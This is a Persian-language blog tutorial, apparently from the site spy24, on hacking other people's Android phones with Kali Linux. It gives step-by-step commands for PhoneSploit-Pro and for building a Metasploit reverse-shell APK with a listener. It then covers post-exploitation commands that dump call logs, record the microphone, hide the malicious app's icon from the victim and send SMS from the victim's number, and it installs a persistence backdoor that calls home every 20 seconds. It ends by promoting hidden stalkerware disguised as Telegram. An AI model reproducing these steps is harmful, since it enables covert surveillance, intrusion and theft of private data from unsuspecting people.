هک اندروید با استفاده از کالی لینوکس (آموزش Kali Linux)

به درخواست بسیاری از کاربران، موضوع این مقاله آموزش هک اندروید با استفاده از کالی لینوکس می باشد. ما در این مقاله از سایت اسپای۲۴ برای شما به آموزش روش هک اندروید با کالی می پردازیم و مطالبی درباره نحوه استفاده کد های لینوکس برای هم برای شما قرار می دهیم. شما برای فراگیری این آموزش، تا انتهای این مقاله همراه ما باشید.

هک اندروید با استفاده از کالی لینوکس:

سیستم عامل اندروید یکی از سیستم عامل های (OS) های محبوب در مجموع جهان میباشد که روزانه افراد بسیاری از ان استفاده می نمایند این OS برای دستگاه های تلفن همراه طراحی شده‌است البته قابلیت و امکان نصب ان در هر سیستمی موجود است. به همین دلیل محبوبیت بخش اعظمی دارد و افراد زیادی در کشور‌ایران و عالم از ان استفاده می‌کنند دراین اموزش با شیوه های تست نفوذ اندروید از طریق کالی لینوکس و هک اندروید با استفاده از کالی لینوکس  و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خوا هیم کرد.

بیشتر بخوانید:

• آموزش هک وای فای با کالی لینوکس تست نفوذ WIFI
• سیستم عامل لینوکس چیست؟ معرفی به سیستم عامل لینوکس

دانلود کالی لینوکس در وب سایت رسمی:

https://www.kali.org/docs/introduction/download-official-kali-linux-images/

نیازمندی ها:

• کالی لینوکس
• Metasploit
• Python3: Python 3.10 یا جدیدتر
• ADB: Android Debug Bridge (ADB) از Android SDK Platform Tool
• Scrcpy
• Nmap

هک گوشی اندروید با ابزار PhoneSploit در کالی

نصب و پیکربندی

مرحله 1: در سیستم لینوکسی خود، به دایرکتوری دسکتاپ حرکت کنید و با وارد کردن دستور زیر، مخزن GitHub را کلون کنید.

cd Desktop
git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git

مرحله 2: حالا پس از کلون کردن به PhoneSploit-Pro، به دایرکتوری ابزار حرکت کرده و فایل‌های داخل آن را لیست کنید.

cd PhoneSploit-Pro
ls

مرحله 3: با وارد کردن دستور زیر، ابزار را اجرا کنید.

sudo python3 phonesploitpro.py

پیکربندی برای دستگاه‌های اندروید

مرحله 1: فعال‌سازی گزینه‌های توسعه‌دهنده

• تنظیمات را باز کنید.
• به بخش «درباره تلفن» بروید.
• شماره ساخت را پیدا کنید.
• روی شماره ساخت ۷ بار کلیک کنید.
• الگو، پین یا رمز عبور خود را وارد کنید تا منوی گزینه‌های توسعه‌دهنده فعال شود.
• منوی گزینه‌های توسعه‌دهنده اکنون در منوی تنظیمات شما ظاهر می‌شود.

مرحله 2: فعال‌سازی اشکال‌زدایی از طریق USB

• تنظیمات را باز کنید.
• به بخش «سیستم > گزینه‌های توسعه‌دهنده» بروید.
• پایین بروید و اشکال‌زدایی از طریق USB را فعال کنید.

بعد از فعال‌سازی اشکال‌زدایی از طریق USB، دستگاه را با کامپیوتر میزبان با یک کابل USB وصل کنید.

بعد از اتصال دستگاه اندروید به کامپیوتر، به ترمینال ابزار بازگردید:

استفاده از ابزار PhoneSploit

مثال 1: آینه‌سازی و کنترل دستگاه
مرحله 1: بیایید ابتدا دستگاه را آینه‌سازی و کنترل کنیم، گزینه ۵ را برای آن انتخاب کنید.

مرحله 2: سپس، از شما برای کیفیت پخش پرسیده می‌شود. برترین کیفیت را با انتخاب گزینه ۱ انتخاب کنید.

پنجره ای بر روی دستگاه اندروید شما ظاهر می‌شود که از شما درخواست اجازه اشکال‌زدایی از طریق USB می‌کند.

وقتی روی اجازه کلیک می‌کنید، شروع به پخش دستگاه شما به سیستم خواهد کرد.

مثال 2: هک دستگاه یا کوشی
حالا بیایید به ویژگی دیگری از این ابزار برویم که بهترین آنها است، یعنی هک دستگاه.

مرحله 1: گزینه ۱۵ را در منوی اصلی وارد کنید، یعنی هک دستگاه. (تلفن اندرویدی ما باید به سیستم متصل شود).

Metasploit-Framework راه‌اندازی خواهد شد. برای ۱۰ ثانیه منتظر بمانید.

مرحله 2: ادامه فرآیند ایجاد فایل APK با استفاده از ابزار.

مرحله 3: ما می‌توانیم LHOST و LPORT را با تایپ M یا فقط فشردن Enter اصلاح کنیم. پس از آن، از شما برای راه‌اندازی پایگاه داده برای ذخیره نمودن بار مفید پرسیده خواهد شد.

مرحله 4: اکنون ابزار شروع به نصب APK بار مفید روی دستگاه می‌کند. پنجره‌ای بر روی دستگاه اندرویدی شما ظاهر می‌شود که از شما برای اجازه نصب APK می‌پرسد.

مرحله 5: گزینه نصب هر چه دارید را انتخاب کنید یا می‌توانید محافظت Google Play را در تنظیمات Google Play خاموش کنید تا از این مرحله عبور کنید.

بعد از نصب، ابزار اکنون برنامه را با درخواست مجوزهای مختلف باز می‌کند.

مرحله 6: اجازه دادن به تمام مجوزها و بر روی ادامه کلیک کنید تا APK بار مفید با موفقیت نصب شود.

مرحله 5: اکنون ابزار Metasploit-Framework راه‌اندازی می‌کند و جلسه Meterpreter به طور خودکار آغاز خواهد شد. حالا کابل USB را جدا کرده و به بهره‌برداری از دستگاه اندرویدی ادامه دهید.

مرحله 6: help را تایپ کنید و Enter را بزنید. تمام حملات ممکن به دستگاه لیست خواهند شد.

مرحله 7: dump_callog را تایپ کنید تا تاریخچه تماس‌های دستگاه را بازیابی کرده و آن را در سیستمتان ذخیره کنید.

همانطور که می‌بینید، تاریخچه تماس‌ها بازیابی و در یک فایل متنی ذخیره شده است.

مرحله 8: record_mic را تایپ کنید تا صدای اطراف دستگاه اندرویدی را ضبط کنید.

این مثال‌هایی از بهره‌برداری از دستگاه و کسب اطلاعات حساس درباره دستگاه اندرویدی بودند.

حملات بسیاری دیگری وجود دارند که می‌توانید آنها را در منوی کمک Meterpreter مشاهده کنید.

می‌توانید با تایپ دستور exit از جلسه خارج شوید.

هک اندروید با ارسال متاسپلویت:

متاسپلویت یک فریمورک قدرتمند تست نفوذ میباشد که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما دوستان ارائه دادیم ؛ البته به طور خلاصه ابزاری میباشد که در هر سیستم عاملی از جمله ویندوز قابل نصب میباشد و به طور پیشفرض در کالی لینوکس موجود است، و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود میباشد. و ما در‌این اموزش با استفاده از یکی‌از پیلود های ان یک فایل برای تست امنیت یا این که هک اندروید خوا هیم ساخت و ان را اجرا می کنیم.

در ابتدا با دستور زیر وارد متاسپلویت گردید

msfconsole

پس از کمی انتظار و باز شدن متا دستور پایین را برای تنظیم و ساخت apk وارد نمایید

use android/meterpreter/reverse_tcp

هم اکنون تنظیمات مرتبط با این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد فرمایید، توجه داشته باشید در‌این بخش باید ای پی سرور خود را وارد نمائید در صورتی که از سرور استفاده نمی‌کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شده‌است.

set LHOST 127.0.0.1

و یک پورت را برای اتصال تعیین فرمائید مثلا ما پورت ۶۰۶۰ را به کارگیری می‌کنیم

set LPORT 6060

درحال حاضر برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد نمائید

generate -f raw -o PentestCore.apk

دستور پایین را برای ایجاد اتصال بین پیلود وارد نمایید

use multi/handler

و پیلود ساخته شده را ست فرمایید ادرس پیلود در واقع ادرسی میباشد که در دستور اول وارد کرده ایم

set PAYLOAD android/meterpreter/reverse_tcp

دوباره تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد و در اخر برای اجرای کافیست دستور exploit را وارد فرمایید و تا نصب اپ اندروید تشکیل‌شده منتظر بمانید. پس از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد و می‌توانید دستورات خود را در سیستم عامل اندروید قربانی اجرا فرمائید یا این که از امکانات متاسپلویت برای ان استفاده نمایید.

درصورتی که که اندروید هدف روت گردیده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و داده ها حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.

3 دستور برای دسترسی پیدا کردن به گوشی اندروید قربانی:

دستورات بسیار زیادی بعد از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می‌توانید با استفاده از دستور help تمام دستورات را ببینید و از آن‌ها استفاده نمائید، ولی درین قسمت از آموزش قصد داریم شما‌را با ۳ دستور مهم و کاربردی آشنا کنیم .

دستور اولیه : hide_app_icon

با استفاده از این دستور می‌توانید آیکن فایل مخرب خود را مخفی فرمایید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.

دستور دوم : check_root

با استفاده از دستور بالا میتوانید ورژن سیستم عامل اندروید هک گردیده خود را بررسی نمائید که ایا روت میباشد یا این که نه؟ تا اگر روت میباشد با استفاده از بکدوری که در ادامه انرا به شما معرفی خوا‌هیم کرد دسترسی خود دائمی فرمایید.

دستور سوم : send_sms -d number -t ” body text sms ”

دستور بالا دستور بسیار جذابی میباشد که میتوانید با استفاده از این دستور با شماره قربانی یک sms به شماره مورد نظر خود ارسال فرمائید.

نکته : در قسمت number می بایست شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد نمایید و در قسمت text بایستی متن دلخواه خود را وارد فرمائید و سپس بر روی enter کلیک نمائید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.

ساخت بک دور بر روی اندروید قربانی:

در ابتدا بایستی با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را بررسی نمایید و در حالتی که اندروید تارگت شما روت بود میتوانید با ایجاد یک بکدور دسترسی خود را دائمی نمائید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :

/ cd

سپس درین مرحله می بایست با استفاده از دستور پایین به مسیر sdcard وارد گردید :

cd /sdcard

سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود فرمائید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت مو جود که با زبان bash درج شده میباشد را بر روی اندروید قربانی خود اپلود نمایید.

upload /root/Desktop/backdoor.sh /sdcard

توجه فرمایید که بایستی مسیر اسکریپت را به درستی وارد فرمایید تا عملیات اپلود به خوبی انجام شود. در مرحله بعدی بایستی با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید . سپس مجددا دو دستور زیر را وارد نمایید تا به محلی که در آن اسکریپت را آپلود نموده اید برسید :

/ cd

cd /sdcard

در‌این قسمت بایستی با استفاده از دستور پایین اسکریپت را برای اجرا بکدور بعداز هک اندروید وارد نمائید :

sh lifetime.sh

در نهایت بایستی با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot نمایید ، سپس هنگامی که اندروید قربانی شما مجددا راه اندازی شما هر ۲۰ ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می‌نماید که می‌توانید از اکسپلویت مولتی هندلر استفاده نمایید و به دستگاه اندروید مورد نظر خود متصل گردید.

مهم ترین روش های افزایش امنیت در اندروید:

• از انتی ویروس های اورجینال اندرویدی استفاده کنید.
• از نصب برنامه های نامعتبر و کرک گردیده خود داری فرمایید.
• با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
• از دریافت برنامه به غیر از پلی استور خود داری نمایید.
• بر روی هر ینکی کلیک نکنید و وارد وب سایت های نامعتبر نشوید.
• از انتی ویروس های فعال استفاده فرمایید که با نصب هر برنامه ان را اسکن نماید.
• دیتا های اصلی خود را در گوشی نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید.
• پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی گوشی مورد نفوذ قرار نگیرد.

امید‌وار‌یم از این اموزش هک اندروید با استفاده از کالی لینوکس و امنیت لذت برده باشید ، چناتنچه سوال یا این که پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال نمایید و در کوتا ترین زمان جواب داده خواهد شد پایدار باشید. متاسفانه از آنجایی که اندروید یک سیستم عامل متن باز است، امکان هک و نفوذ به آن نیز زیاد میباشد. این سیستم عامل به جهت متن باز بودن امکانات کاملی را برای توسعه دهندگان برنامه ها و سیستم عامل ها فراهم می آورد. سیستم عامل های متن باز معمولا دسترسی های بیشتری را برای کاربرانشان به وجود می آورند به همین دلیل بیش تر در معرض هک اندروید قرار میگیرد. سیستم عامل اندروید نیز در خطر انواع بدافزارها، ویروس ها و برنامه های هک برای آن نوشته شده میباشد.

امروز قصد داریم نکاتی را درباره‌ی شیوه های هک اندروید و راه های نفوذ به‌این سیستم عامل را بررسی کرده و در اختیار دوست داران قرار دهیم.

هک اندروید به چه شکل امکان پذیر میباشد ؟

در همین در آغاز، بدون اینکه بخواهیم شما‌را گیج کنیم، بایستی بگوییم تمام دستگاهای الکترونیکی قابل هک شدن می‌باشند و دستگاه های اندرویدی نیز از این قاعده مستثنی نیستند. شیوه های هک موبایل اندروید بسیار متنوع و زیاد میباشد تا جایی که حتی افرادی که دانش چندانی در مورد برنامه نویسی و هک ندارند، باز هم می‌توانند موبایل های اندروید را با چند راهکار ساده هک نمایند. این دستگاهای اندرویدی مانند اکثر ابزارهای الکترونیکی قابلیت و امکان هک شدن را دارند ولی شیوه های هک آن مختلف بوده و هر کس با توجه به توانایی های خود می‌تواند یک روش خاص را انتخاب کند. هر روشی نیز به ابزاری خاص نیازمند میباشد، که‌این ابزارها میزان دسترسی و کیفیت هک شما‌را مشخص مینمایند.

شاخص ترین شیوه و ابزاری که یک هکر قادر است برای انجام هک اندروید از آن استفاده نماید، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس میباشد که از ورژن کالی لینوکس یا این که بکترک استفاده نماید. خبر بد برای دارندگان موبایل های اندروید این میباشد که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شده‌است و همین عامل سبب می‌گردد پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت بپذیرد.

هک اندروید با روشهای گوناگون کالی لینوکس:

برای اینکه بتوان اقدام به هک اندروید با استفاده از کالی لینوکس را روی سیستم خود داشته باشید  بعد از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می‌نماید. با استفاده از این ابزار، هکر اقدام به ایجاد یک برنامه هک اندروید به صورت APK می‌نماید. برای ساخت چنین ابزاری هکر فقط نیاز دارد که دستور پایین را در محیط ترمینال لینوکس وارد کند.

فرمان فوق هکر به جای عبارت LHOST می تواند از نشانی آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده نماید. Name.apk اسم ابزاری میباشد که هکر آن را می سازد تا با آن اقدام به هک اندروید کند.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

Msf>use exploit/multi/handler

Msf>set PAYLOAD android/meterpreter/reverse_tcp

Msf>set LHOST 192.168.1.35

Msf>set LPORT 443

اما این توشه در قسمت LHOST نیاز میباشد که آدرس سرور را وارد نماید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام می‌شود و شما به خواسته خود رسیده اید. هم اکنون هنگامی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک نماید و آن را اجرا نماید، عملیات هک با کالی لینوکس برد آمیز انجام می گردد. همانگونه که میبینید در‌این شیوه هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورها هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید کند.

هک اندروید با برنامه های هک گوناگون:

همانطور که گفتیم ابزارهایی که برای هک استفاده میکنید میزان دسترسی و کیفیت عمل هک را تعیین می‌کند. یکی از دیگر از ابزارهایی که بسیار مورد استفاده هکرها به خصوص هکرهایی با سواد کمتر در این مورد قرار می‌گیرد، نرم افزارهای هک و نفوذ به اندروید می‌باشد.

این برنامه ها معمولا توسط هکرهای حرفه ای ساخته میگردند و هکرهای غیرحرفه ای و حتی افراد معمولی نیز از آن ها برای هک موبایل شخص موردنظرشان استفاده می نمایند. تعداد این برنامه ها آنقدر زیاد میباشد که انسان در انتخاب یک کدام از آنها ممکن میباشد حتی گیج شود. اما این اپلیکیشن ها برای اجرا و درست کار کردن نیازمند الزاماتی می‌باشند که برخی به سادگی در اختیار همه قرار نمی گیرند. در پی مقاله تعدای از نرم افزارهای هک را به اجمال معرفی خوا‌هیم نمود.

هک اندروید با برنامه AndroRAT:

یک کدام از برنامه های معروف و پرطرفدار در این مورد که تاکنون بسیار موفق عمل کرده است ، برنامه AndroRAT است. اسم این اپلیکیشن مخفف عبارت دسترسی از راه دور به دستگاه اندرویدی می‌باشد. این برنامه به صورت رایگان در اختیار کاربرانش قرار گرفته میباشد و قابلیت و امکان هک گوشی از راه دور را نیز به آنان می‌دهد، همچنین با استفاده از این برنامه می توان اقدام به ارسال Sms بوسیله موبایل قربانی نمود. یکی‌از ویژگی هایی که باعث محبوبیت این برنامه شده‌است، امکان تصویر برداری با استفاده از دوربین موبایل هدف میباشد.

اپلیکیشن هک اندروید zANTI:

بسیاری از اپلیکیشن ها می باشند که به نرم افزارهای هک معروفند ولی با هدف انجام تست نفوذ به سیستم طراحی و عرضه می گردند. اپلیکیشن zanty نیز یکی این نرم افزارهاست که به کارشناسان امنیت شبکه کمک می‌نماید در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکه کنند. این برنامه هک اندروید به برنامه Backtrack تلفن همراه معروف هست، چرا‌که همچون سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربران برای انجام عمل هک قرار می‌دهد و از طرفی قدرت فوق العاده ای نیز دارد.

برنامه کنترل اسیای۲۴

اسیای۲۴ یکی‌از دیگر از برنامه هایی میباشد که می‌تواند کارهک اندروید با استفاده از کالی لینوکس، کنترل و هک گوشی شخص موردنظر شما‌را انجام دهد. این برنامه با انگیزه نظارت بر فرزندان در فضای مجازی به وسیله سامانه کنترل فرزند طراحی و نوشته شده میباشد.

اسیای۲۴ در دو ورژن بدون دسترسی ( هک با شماره تلفن ) و با دسترسی ارائه می‌شود. که ولی ورژن جدید این برنامه نیز با اسم اسیای۲۴ منتشر گردیده که شما می‌توانید آن را با آیکون دلخواهتان برای مثال تلگرام بدون فیلترشکن برای فرزندتان ارسال نمایید، به محض کلیک فرزند برروی لینک و پیوند ارسالی شما، برنامه به طور اتوماتیک نصب می‌شود و سپس از لیست نرم افزارها پنهان می گردد. قابلیت و امکان های منحصر به فردی که‌این نسخه ارائه داده میباشد، شنود و ضبط مکالمات فرزند و مشاهده تصاویر اطراف توسط دوربین گوشی فرزند است.

کلام آخر…

ما در این مقاله به آموزش هک اندروید با استفاده از کالی لینوکس پرداختیم و گفتیم چگونه از طریق این ابزار می توانید به راحتی اقدام به هک اندروید دیگران نماید. شما می توانید برای آشنایی با 4 روش نفوذ به اندروید دیگران و مشاهده کد های لینوکس برای هک، این مقاله را تا انتها مطالعه نماید و نظرات خود را در بخش کامنت برای ما قرار دهید. سایت spy24 همراه همیشگی شماست تا همیشه بهترین آموزش ها را برای شما قرار دهد.